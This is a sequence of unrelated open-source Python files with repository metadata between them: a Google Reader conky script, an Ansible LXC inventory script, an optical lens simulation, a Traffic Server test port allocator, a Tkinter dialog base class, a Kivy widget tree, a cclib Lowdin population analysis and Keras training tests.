output = output.replace("[name]",name)
output = output.replace("[url]",url)
return output
except Exception,e:
self.logError("getOutputFromTemplate:Unexpected error:" + e.__str__())
return ""
def getOutputFromSummaryTemplate(self, summarytemplate, totalfeedscount, unreadfeedscount, unreadfeeditemscount):
try:
output = summarytemplate
output = output.replace("[totalfeedscount]",totalfeedscount)
output = output.replace("[unreadfeedscount]",unreadfeedscount)
output = output.replace("[unreadfeeditemscount]",unreadfeeditemscount)
return output
except Exception,e:
self.logError("getOutputFromSummaryTemplate:Unexpected error:" + e.__str__())
return ""
def getAuthorizationHeader(self):
# Authenticate to obtain SID
auth_url = 'https://www.google.com/accounts/ClientLogin'
auth_req_data = urllib.urlencode({'Email': self.options.username,
'Passwd': self.options.password,
'service': 'reader'})
auth_req = urllib2.Request(auth_url, data=auth_req_data)
auth_resp = urllib2.urlopen(auth_req)
auth_resp_content = auth_resp.read()
auth_resp_dict = dict(x.split('=') for x in auth_resp_content.split('\n') if x)
AUTH = auth_resp_dict["Auth"]
# Create a header using the AUTH key
header = {"Authorization" : "GoogleLogin auth=%s"%AUTH}
return header
def getUnreadItems(self, auth_header):
url = "https://www.google.com/reader/api/0/unread-count?all=true"
request = urllib2.Request(url, None, auth_header)
response = urllib2.urlopen(request)
unreadxml = response.read()
url = "https://www.google.com/reader/api/0/subscription/list"
request = urllib2.Request(url, None, auth_header)
response = urllib2.urlopen(request)
namesxml = response.read()
if '<object>' in unreadxml:
feedlist = minidom.parseString(unreadxml).getElementsByTagName('string')
namelist = minidom.parseString(namesxml).getElementsByTagName('string')
feeds = []
unreadcount = 0
unreadfeedcount = 0
unreadfeeditemscount = 0
for nodeFeed in feedlist:
feedurl = nodeFeed.firstChild.toxml()
# ignore user/ based nodes, only concerned with feed/ based nodes
if feedurl.startswith("feed/") == True:
unreadcount = nodeFeed.nextSibling.firstChild.toxml()
for nodeName in namelist:
nodeText = nodeName.firstChild.toxml()
if nodeText.startswith("feed/"):
if nodeText == feedurl:
feedname = nodeName.nextSibling.firstChild.toxml()
break
feedurl = feedurl.lstrip("feed/")
#feeds.append((unreadcount , feedurl, feedname))
feedData = FeedData(feedname, feedurl, unreadcount)
feeds.append(feedData)
unreadfeeditemscount = unreadfeeditemscount + int(unreadcount)
unreadfeedcount = unreadfeedcount + 1
else:
pass #invalid feedurl?
totalfeedcount = len(namelist)
feeds.sort()
return str(totalfeedcount), str(unreadfeedcount), str(unreadfeeditemscount), feeds
else:
return 0
def logInfo(self, text):
if self.options.verbose == True:
print >> sys.stdout, "INFO: " + text
if self.options.infologfile != None:
datetimestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
fileoutput = open(self.options.infologfile, "ab")
fileoutput.write(datetimestamp+" INFO: "+text+"\n")
fileoutput.close()
def logError(self, text):
print >> sys.stderr, "ERROR: " + text
if self.options.errorlogfile != None:
datetimestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
fileoutput = open(self.options.errorlogfile, "ab")
fileoutput.write(datetimestamp+" ERROR: "+text+"\n")
fileoutput.close()
def main():
parser = CommandLineParser()
(options, args) = parser.parse_args()
if options.version == True:
print >> sys.stdout,"conkyGoogleReader v.1.08"
else:
if options.username == None:
print >> sys.stdout, "A username was not given!"
sys.exit(2)
if options.verbose == True:
print >> sys.stdout, "username:",options.username
print >> sys.stdout, "password:",options.password
print >> sys.stdout, "template:",options.template
print >> sys.stdout, "summarytemplate:",options.summarytemplate
print >> sys.stdout, "summaryoutput:",options.summaryoutput
print >> sys.stdout, "verbose:",options.verbose
# create new google reader object
greader = GoogleReader(options)
greader.writeOutput()
if __name__ == '__main__':
main()
sys.exit()
|
gpl-3.0
|
blakfeld/ansible
|
contrib/inventory/libvirt_lxc.py
|
132
|
1324
|
#!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['virsh', '-q', '-c', 'lxc:///', 'list', '--name', '--all'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'lxc'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'lxc'})
else:
print "Need an argument, either --list or --host <host>"
|
gpl-3.0
|
hexastorm/opticaldesign
|
simulation.py
|
1
|
3946
|
%pylab inline
import warnings
import numpy as np
import matplotlib.pyplot as plt
import rayopt as ro
# Lens used 12.5mm Dia. x 90mm FL, VIS-NIR, Inked, Achromatic Lens from Edmund Optics
# LINK: http://www.edmundoptics.com/document/download/391099
filename='zmax_49332ink.zmx'
with open(filename) as file:
data=file.read()
# Parameters:
wavelength=405e-9 # wavelength [m]
D=0.8 # diameter bundle [mm] see, s.scale=0.001 [m]
T=35 # plate thickness [mm]
utilt=np.radians(0) # tilt angle plate [radians]
# Radius plate
# I can't remember why I use tangent, should not matter
# as long diameter is large enough
spol=T*np.tan(np.pi/8)
# Create the system
s=ro.zemax.zmx_to_system(data)
s.object.pupil.radius = D/2
# Ensures rays created with function ray_point are in the [-D/2,D/2] range
s.object.pupil.update_radius = False
s.object.angle = np.radians(0) # [radians]
s.wavelengths = [wavelength]
s.update()
# changes needed to make the Zemax data compatible with Rayopt
del s[0]
# set physical size of the offset surface, i.e. the left line in the drawing
s[0].radius = 20 # [mm]
# sets the length between the first virtual offset surface and the lens
s[1].distance = 0 # [mm]
# add parallel plate to the system
s.insert(4,ro.elements.Spheroid(distance=10,material='SCHOTT/N-BK7',
diameter=spol*2,angles=[utilt,0,0]))
s.insert(5,ro.elements.Spheroid(distance=T/np.cos(utilt),material='basic/air',
diameter=spol*2,angles=[utilt,0,0]))
#NOTE: due to rotation the thickness increases to T/np.cos(utilt)
# if this is not done the transversal focus shift displacement
# does not agree with the theoretical model
s.update()
#s.align(s.paraxial.n) # used by jordens for astigmatic focus shift, destroys rotation
# astigmatic focus shift , can also be obtained from print(q) and looking at table
#print("Astigmatic focus shift "+str(abs(q.waist_position.T[0][-1])-abs(q.waist_position.T[1][-1])))+" mm.")
# Geometric trace
g = ro.GeometricTrace(s)
# In my system, I am only interested in one field
# with a field angle equal to zero radians
# Several distribution can be chosen; hexapolar, random, radau
# The radau scheme should be able to give a good result while using not so many rays
fieldangle=0
g.rays_point((0, fieldangle), wavelength=wavelength, nrays=20,
distribution="radau", filter=False, clip=False)
# Geometric focus [used]
g.refocus()
q = ro.GaussianTrace(s)
if utilt==0:
fig, ax = plt.subplots()
s.plot(ax)
q.plot(ax, color="red", scale=1)
print("The spot radius is "+str(q.spot_radius[-1][0]*1000))
print("The Gaussian waist radius is "+str(round(q.spot_radius[-1][0]*1000,2))+" micrometers.")
print("The Rayleigh range is "+str(q.rayleigh_range[-1][0])+ " mm.")
# The geometric RMS spotsize is then calculated at the focal point
# i.e. RMS= <(W-<W>)2>1/2
# on default Rayopt specifies the focal point at the last surface
# as it sets i=surface equal to -1.
# all rays are given the same "weight"
print("RMS geometric spotsize is "+str(g.rms()*1000)+" micrometers.")
# The focus point distance is measured with respect to the lens
print("The focus point distance from the lens is "+str(g.path[-1]-g.path[3])+" mm.")
print("The transversal displacement is "+str(g.y[-1,-1,1])+" mm.")
p, qq, opd = g.opd(resample=False)
print("The lambda OPD RMS is "+str(np.sqrt((opd**2 * g.w).sum()/g.w.sum())))
#
p = ro.ParaxialTrace(s)
print("The Airy radius is "+ str(p.airy_radius[1]*1000)+" micrometers.")
# paraxial focus [not used]
#s.paraxial.refocus()
ro.Analysis(s,refocus_full=False, update=False)
# Gaussian trace
# plot only works at ultilt is 0 degrees
# Seidel aberrations
#z = ro.PolyTrace(s)
#str(z)
# Retrieve seidel
#print("\n".join(z.print_seidel()))
|
gpl-3.0
|
davidbz/trafficserver
|
tests/gold_tests/autest-site/ports.py
|
5
|
3718
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import subprocess
import os
import platform
import hosts.output as host
try:
import queue as Queue
except ImportError:
import Queue
g_ports = None # ports we can use
def PortOpen(port, address=None):
ret = False
if address is None:
address = "localhost"
address = (address, port)
try:
s = socket.create_connection(address, timeout=.5)
s.close()
ret = True
except socket.error:
s = None
ret = False
except socket.timeout:
s = None
return ret
def setup_port_queue(amount=1000):
global g_ports
if g_ports is None:
g_ports = Queue.LifoQueue()
else:
return
try:
# some docker setups don't have sbin setup correctly
new_env = os.environ.copy()
new_env['PATH'] = "/sbin:/usr/sbin:" + new_env['PATH']
if 'Darwin' == platform.system():
dmin = subprocess.check_output(
["sysctl", "net.inet.ip.portrange.first"],
env=new_env
).decode().split(":")[1].split()[0]
dmax = subprocess.check_output(
["sysctl", "net.inet.ip.portrange.last"],
env=new_env
).decode().split(":")[1].split()[0]
else:
dmin, dmax = subprocess.check_output(
["sysctl", "net.ipv4.ip_local_port_range"],
env=new_env
).decode().split("=")[1].split()
dmin = int(dmin)
dmax = int(dmax)
except:
host.WriteWarning("Unable to call sysctrl!\n Tests may fail because of bad port selection!")
return
rmin = dmin - 2000
rmax = 65536 - dmax
if rmax > amount:
# fill in ports
port = dmax + 1
while port < 65536 and g_ports.qsize() < amount:
# if port good:
if not PortOpen(port):
g_ports.put(port)
port += 1
if rmin > amount and g_ports.qsize() < amount:
port = 2001
while port < dmin and g_ports.qsize() < amount:
# if port good:
if not PortOpen(port):
g_ports.put(port)
port += 1
def get_port(obj, name):
'''
Get a port and set it to a variable on the object
'''
setup_port_queue()
if g_ports.qsize():
# get port
port = g_ports.get()
# assign to variable
obj.Variables[name] = port
# setup clean up step to recycle the port
obj.Setup.Lambda(func_cleanup=lambda: g_ports.put(
port), description="recycling port")
return port
# use old code
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 0)) # bind to all interfaces on an ephemeral port
port = sock.getsockname()[1]
obj.Variables[name] = port
return port
|
apache-2.0
|
2ndy/RaspIM
|
usr/lib/python2.7/lib-tk/tkCommonDialog.py
|
193
|
1418
|
# base class for tk common dialogues
#
# this module provides a base class for accessing the common
# dialogues available in Tk 4.2 and newer. use tkFileDialog,
# tkColorChooser, and tkMessageBox to access the individual
# dialogs.
#
# written by Fredrik Lundh, May 1997
#
from Tkinter import *
class Dialog:
command = None
def __init__(self, master=None, **options):
# FIXME: should this be placed on the module level instead?
if TkVersion < 4.2:
raise TclError, "this module requires Tk 4.2 or newer"
self.master = master
self.options = options
if not master and options.get('parent'):
self.master = options['parent']
def _fixoptions(self):
pass # hook
def _fixresult(self, widget, result):
return result # hook
def show(self, **options):
# update instance options
for k, v in options.items():
self.options[k] = v
self._fixoptions()
# we need a dummy widget to properly process the options
# (at least as long as we use Tkinter 1.63)
w = Frame(self.master)
try:
s = w.tk.call(self.command, *w._options(self.options))
s = self._fixresult(w, s)
finally:
try:
# get rid of the widget
w.destroy()
except:
pass
return s
|
gpl-2.0
|
ihidalgo/uip-prog3
|
Parciales/practicas/kivy-designer-master/designer/tree.py
|
5
|
2922
|
from kivy.uix.widget import Widget
class TreeException(Exception):
pass
class TreeNode(object):
'''TreeNode class for representing information of Widgets
'''
def __init__(self):
super(TreeNode, self).__init__()
self.parent_node = None
self.list_children = []
self.class_name = ''
self.base_class_name = ''
self.is_subclassed = False
self.widget = None
class Tree(object):
'''Tree class for saving all the information regarding widgets
'''
def __init__(self):
super(Tree, self).__init__()
self.list_root_nodes = []
def insert(self, widget, parent=None):
'''inserts a new node of widget with parent.
Returns new node on success
'''
if not isinstance(widget, Widget):
TreeException('Tree accepts only Widget to be inserted')
if parent is None:
node = TreeNode()
node.widget = widget
self.list_root_nodes.append(node)
return node
if not isinstance(parent, Widget):
TreeException('Tree only accepts parent to be a Widget')
parent_node = self.get_node_for_widget(parent)
node = TreeNode()
node.widget = widget
node.parent_node = parent_node
if parent_node is None:
self.list_root_nodes.append(node)
else:
parent_node.list_children.append(node)
return node
def _get_node_for_widget(self, widget, node):
if node.widget == widget:
return node
for _node in node.list_children:
node_found = self._get_node_for_widget(widget, _node)
if node_found is not None:
return node_found
return None
def get_node_for_widget(self, widget):
'''Returns node for widget, None if not found
'''
for _root in self.list_root_nodes:
node = self._get_node_for_widget(widget, _root)
if node is not None:
return node
return None
def traverse_tree(self, node=None):
'''Traverse the tree, and run traverse code for every node
'''
if node is None:
for _node in self.list_root_nodes:
self.traverse_tree(_node)
else:
# Add traverse code here
for child in node.list_children:
self.traverse_tree(child)
def delete(self, widget):
'''deletes a node of widget from the Tree.
Returns that node on deletion
'''
if not isinstance(widget, Widget):
TreeException('Tree accepts only Widget to be deleted')
node = self.get_node_for_widget(widget)
if node in self.list_root_nodes:
self.list_root_nodes.remove(node)
else:
node.parent_node.list_children.remove(node)
return node
|
mit
|
nyee/RMG-Py
|
external/cclib/method/lpa.py
|
24
|
4492
|
"""
cclib (http://cclib.sf.net) is (c) 2006, the cclib development team
and licensed under the LGPL (http://www.gnu.org/copyleft/lgpl.html).
"""
__revision__ = "$Revision: 837 $"
import random
import numpy
from population import Population
class LPA(Population):
"""The Lowdin population analysis"""
def __init__(self, *args):
# Call the __init__ method of the superclass.
super(LPA, self).__init__(logname="LPA", *args)
def __str__(self):
"""Return a string representation of the object."""
return "LPA of" % (self.data)
def __repr__(self):
"""Return a representation of the object."""
return 'LPA("%s")' % (self.data)
def calculate(self, indices=None, x=0.5, fupdate=0.05):
"""Perform a calculation of Lowdin population analysis.
Inputs:
indices - list of lists containing atomic orbital indices of fragments
x - overlap matrix exponent in wavefunxtion projection (x=0.5 for Lowdin)
"""
# Do we have the needed info in the parser?
if not hasattr(self.data,"mocoeffs"):
self.logger.error("Missing mocoeffs")
return False
if not (hasattr(self.data, "aooverlaps") \
or hasattr(self.data, "fooverlaps") ):
self.logger.error("Missing overlap matrix")
return False
if not hasattr(self.data, "nbasis"):
self.logger.error("Missing nbasis")
return False
if not hasattr(self.data, "homos"):
self.logger.error("Missing homos")
return False
unrestricted = (len(self.data.mocoeffs) == 2)
nbasis = self.data.nbasis
# Determine number of steps, and whether process involves beta orbitals.
self.logger.info("Creating attribute aoresults: [array[2]]")
alpha = len(self.data.mocoeffs[0])
self.aoresults = [ numpy.zeros([alpha, nbasis], "d") ]
nstep = alpha
if unrestricted:
beta = len(self.data.mocoeffs[1])
self.aoresults.append(numpy.zeros([beta, nbasis], "d"))
nstep += beta
#intialize progress if available
if self.progress:
self.progress.initialize(nstep)
if hasattr(self.data, "aooverlaps"):
S = self.data.aooverlaps
elif hasattr(self.data, "fooverlaps"):
S = self.data.fooverlaps
# Get eigenvalues and matrix of eigenvectors for transformation decomposition (U).
# Find roots of diagonal elements, and transform backwards using eigevectors.
# We need two matrices here, one for S^x, another for S^(1-x).
# We don't need to invert U, since S is symmetrical.
eigenvalues, U = numpy.linalg.eig(S)
UI = U.transpose()
Sdiagroot1 = numpy.identity(len(S))*numpy.power(eigenvalues, x)
Sdiagroot2 = numpy.identity(len(S))*numpy.power(eigenvalues, 1-x)
Sroot1 = numpy.dot(U, numpy.dot(Sdiagroot1, UI))
Sroot2 = numpy.dot(U, numpy.dot(Sdiagroot2, UI))
step = 0
for spin in range(len(self.data.mocoeffs)):
for i in range(len(self.data.mocoeffs[spin])):
if self.progress and random.random() < fupdate:
self.progress.update(step, "Lowdin Population Analysis")
ci = self.data.mocoeffs[spin][i]
temp1 = numpy.dot(ci, Sroot1)
temp2 = numpy.dot(ci, Sroot2)
self.aoresults[spin][i] = numpy.multiply(temp1, temp2).astype("d")
step += 1
if self.progress:
self.progress.update(nstep, "Done")
retval = super(LPA, self).partition(indices)
if not retval:
self.logger.error("Error in partitioning results")
return False
# Create array for charges.
self.logger.info("Creating fragcharges: array[1]")
size = len(self.fragresults[0][0])
self.fragcharges = numpy.zeros([size], "d")
for spin in range(len(self.fragresults)):
for i in range(self.data.homos[spin] + 1):
temp = numpy.reshape(self.fragresults[spin][i], (size,))
self.fragcharges = numpy.add(self.fragcharges, temp)
if not unrestricted:
self.fragcharges = numpy.multiply(self.fragcharges, 2)
return True
if __name__ == "__main__":
import doctest, lpa
doctest.testmod(lpa, verbose=False)
|
mit
|
mengxn/tensorflow
|
tensorflow/contrib/keras/python/keras/engine/training_test.py
|
36
|
24119
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training routines."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.keras.python import keras
from tensorflow.contrib.keras.python.keras import testing_utils
from tensorflow.contrib.keras.python.keras.engine.training import _weighted_masked_objective
from tensorflow.python.platform import test
class TrainingTest(test.TestCase):
def test_fit_on_arrays(self):
with self.test_session():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics, loss_weights=loss_weights)
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
# Test fit at different verbosity
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=1)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=2,
batch_size=5,
verbose=2)
model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np])
# Test with validation data
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=1,
batch_size=5,
verbose=0)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=2,
batch_size=5,
verbose=1)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=2,
batch_size=5,
verbose=2)
# Test with validation split
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=2,
batch_size=5,
verbose=0,
validation_split=0.2)
# Test with dictionary inputs
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
epochs=1,
batch_size=5,
verbose=0)
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
epochs=1,
batch_size=5,
verbose=1)
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
validation_data=({
'input_a': input_a_np,
'input_b': input_b_np
}, {
'dense': output_d_np,
'dropout': output_e_np
}),
epochs=1,
batch_size=5,
verbose=0)
model.train_on_batch({
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np})
# Test with lists for loss, metrics
loss = ['mae', 'mse']
metrics = ['acc', 'mae']
model.compile(optimizer, loss, metrics=metrics)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
# Test with dictionaries for loss, metrics, loss weights
loss = {'dense': 'mse', 'dropout': 'mae'}
loss_weights = {'dense': 1., 'dropout': 0.5}
metrics = {'dense': 'mse', 'dropout': 'mae'}
model.compile(optimizer, loss, metrics=metrics, loss_weights=loss_weights)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
def test_evaluate_predict_on_arrays(self):
with self.test_session():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae']
model.compile(
optimizer,
loss,
metrics=metrics,
loss_weights=loss_weights,
sample_weight_mode=None)
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
# Test evaluate at different verbosity
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=0)
self.assertEqual(len(out), 5)
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=1)
self.assertEqual(len(out), 5)
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=2)
self.assertEqual(len(out), 5)
out = model.test_on_batch([input_a_np, input_b_np],
[output_d_np, output_e_np])
self.assertEqual(len(out), 5)
# Test evaluate with dictionary inputs
model.evaluate(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
batch_size=5,
verbose=0)
model.evaluate(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
batch_size=5,
verbose=1)
# Test predict
out = model.predict([input_a_np, input_b_np], batch_size=5)
self.assertEqual(len(out), 2)
out = model.predict({'input_a': input_a_np, 'input_b': input_b_np})
self.assertEqual(len(out), 2)
out = model.predict_on_batch({
'input_a': input_a_np,
'input_b': input_b_np
})
self.assertEqual(len(out), 2)
class LossWeightingTest(test.TestCase):
def test_class_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_shape=(input_dim,)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
class_weight=class_weight,
validation_data=(x_train, y_train, sample_weight))
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 2,
verbose=0,
class_weight=class_weight)
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 2,
verbose=0,
class_weight=class_weight,
validation_split=0.1)
model.train_on_batch(
x_train[:batch_size], y_train[:batch_size], class_weight=class_weight)
ref_score = model.evaluate(x_test, y_test, verbose=0)
score = model.evaluate(
x_test[test_ids, :], y_test[test_ids, :], verbose=0)
self.assertLess(score, ref_score)
def test_sample_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_shape=(input_dim,)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=sample_weight)
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=sample_weight,
validation_split=0.1)
model.train_on_batch(
x_train[:batch_size],
y_train[:batch_size],
sample_weight=sample_weight[:batch_size])
model.test_on_batch(
x_train[:batch_size],
y_train[:batch_size],
sample_weight=sample_weight[:batch_size])
ref_score = model.evaluate(x_test, y_test, verbose=0)
score = model.evaluate(
x_test[test_ids, :], y_test[test_ids, :], verbose=0)
self.assertLess(score, ref_score)
def test_temporal_sample_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
timesteps = 3
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.TimeDistributed(
keras.layers.Dense(num_classes),
input_shape=(timesteps, input_dim)))
model.add(keras.layers.Activation('softmax'))
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
temporal_x_train = np.reshape(x_train, (len(x_train), 1,
x_train.shape[1]))
temporal_x_train = np.repeat(temporal_x_train, timesteps, axis=1)
temporal_x_test = np.reshape(x_test, (len(x_test), 1, x_test.shape[1]))
temporal_x_test = np.repeat(temporal_x_test, timesteps, axis=1)
temporal_y_train = np.reshape(y_train, (len(y_train), 1,
y_train.shape[1]))
temporal_y_train = np.repeat(temporal_y_train, timesteps, axis=1)
temporal_y_test = np.reshape(y_test, (len(y_test), 1, y_test.shape[1]))
temporal_y_test = np.repeat(temporal_y_test, timesteps, axis=1)
temporal_sample_weight = np.reshape(sample_weight, (len(sample_weight),
1))
temporal_sample_weight = np.repeat(
temporal_sample_weight, timesteps, axis=1)
model.compile(
loss='binary_crossentropy',
optimizer='rmsprop',
sample_weight_mode='temporal')
model.fit(
temporal_x_train,
temporal_y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=temporal_sample_weight)
model.fit(
temporal_x_train,
temporal_y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=temporal_sample_weight,
validation_split=0.1)
model.train_on_batch(
temporal_x_train[:batch_size],
temporal_y_train[:batch_size],
sample_weight=temporal_sample_weight[:batch_size])
model.test_on_batch(
temporal_x_train[:batch_size],
temporal_y_train[:batch_size],
sample_weight=temporal_sample_weight[:batch_size])
ref_score = model.evaluate(temporal_x_test, temporal_y_test, verbose=0)
score = model.evaluate(
temporal_x_test[test_ids], temporal_y_test[test_ids], verbose=0)
self.assertLess(score, ref_score)
class LossMaskingTest(test.TestCase):
def test_masking(self):
with self.test_session():
np.random.seed(1337)
x = np.array([[[1], [1]], [[0], [0]]])
model = keras.models.Sequential()
model.add(keras.layers.Masking(mask_value=0, input_shape=(2, 1)))
model.add(
keras.layers.TimeDistributed(
keras.layers.Dense(1, kernel_initializer='one')))
model.compile(loss='mse', optimizer='sgd')
y = np.array([[[1], [1]], [[1], [1]]])
loss = model.train_on_batch(x, y)
self.assertEqual(loss, 0)
def test_loss_masking(self):
with self.test_session():
weighted_loss = _weighted_masked_objective(keras.losses.get('mae'))
shape = (3, 4, 2)
x = np.arange(24).reshape(shape)
y = 2 * x
# Normally the trailing 1 is added by standardize_weights
weights = np.ones((3,))
mask = np.ones((3, 4))
mask[1, 0] = 0
keras.backend.eval(
weighted_loss(
keras.backend.variable(x),
keras.backend.variable(y),
keras.backend.variable(weights), keras.backend.variable(mask)))
class TestDynamicTrainability(test.TestCase):
